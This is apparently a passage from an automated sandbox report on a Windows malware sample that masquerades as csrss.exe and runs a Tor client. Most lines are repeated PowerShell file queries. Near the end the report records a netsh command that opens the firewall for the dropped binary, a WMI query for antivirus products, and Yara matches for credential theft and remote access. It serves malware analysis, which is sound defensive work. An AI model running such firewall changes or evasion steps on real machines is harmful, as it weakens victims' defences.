        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\tor.exeQueries volume information: C:\Users\user\AppData\Local\Temp\csrss\tor\torrc VolumeInformation
        Source: C:\Windows\rss\csrss.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

        Lowering of HIPS / PFW / Operating System Security Settings

        barindex
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        Source: C:\Users\user\Desktop\kdsyitkxmS.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        Source: C:\Users\user\Desktop\kdsyitkxmS.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
        Source: csrss.exe, 00000014.00000003.210669065138.000000000C564000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.209396461579.000000000C60E000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: msmpeng.exe
        Source: csrss.exe, 00000014.00000003.210669065138.000000000C564000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.209396461579.000000000C60E000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: MsMpEng.exe

        Stealing of Sensitive Information

        barindex
        Source: Yara match | File source: 10.3.kdsyitkxmS.exe.3ab0000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 58.3.csrss.exe.3d00000.3.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000003D.00000003.209030995606.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000003A.00000003.208966850463.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000037.00000003.208942288673.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: Process Memory Space: kdsyitkxmS.exe PID: 4688, type: MEMORYSTR
        Source: Yara match | File source: Process Memory Space: kdsyitkxmS.exe PID: 8716, type: MEMORYSTR
        Source: Yara match | File source: Process Memory Space: csrss.exe PID: 2532, type: MEMORYSTR
        Source: Yara match | File source: Process Memory Space: csrss.exe PID: 768, type: MEMORYSTR
        Source: Yara match | File source: Process Memory Space: csrss.exe PID: 7048, type: MEMORYSTR
        Source: Yara match | File source: Process Memory Space: csrss.exe PID: 8952, type: MEMORYSTR
        Source: Yara match | File source: Process Memory Space: csrss.exe PID: 9120, type: MEMORYSTR
        Source: Yara match | File source: Process Memory Space: csrss.exe PID: 7120, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Source: Yara match | File source: 10.3.kdsyitkxmS.exe.3ab0000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 58.3.csrss.exe.3d00000.3.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000003D.00000003.209030995606.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000003A.00000003.208966850463.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000037.00000003.208942288673.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: Process Memory Space: kdsyitkxmS.exe PID: 4688, type: MEMORYSTR
        Source: Yara match | File source: Process Memory Space: kdsyitkxmS.exe PID: 8716, type: MEMORYSTR
        Source: Yara match | File source: Process Memory Space: csrss.exe PID: 2532, type: MEMORYSTR
        Source: Yara match | File source: Process Memory Space: csrss.exe PID: 768, type: MEMORYSTR
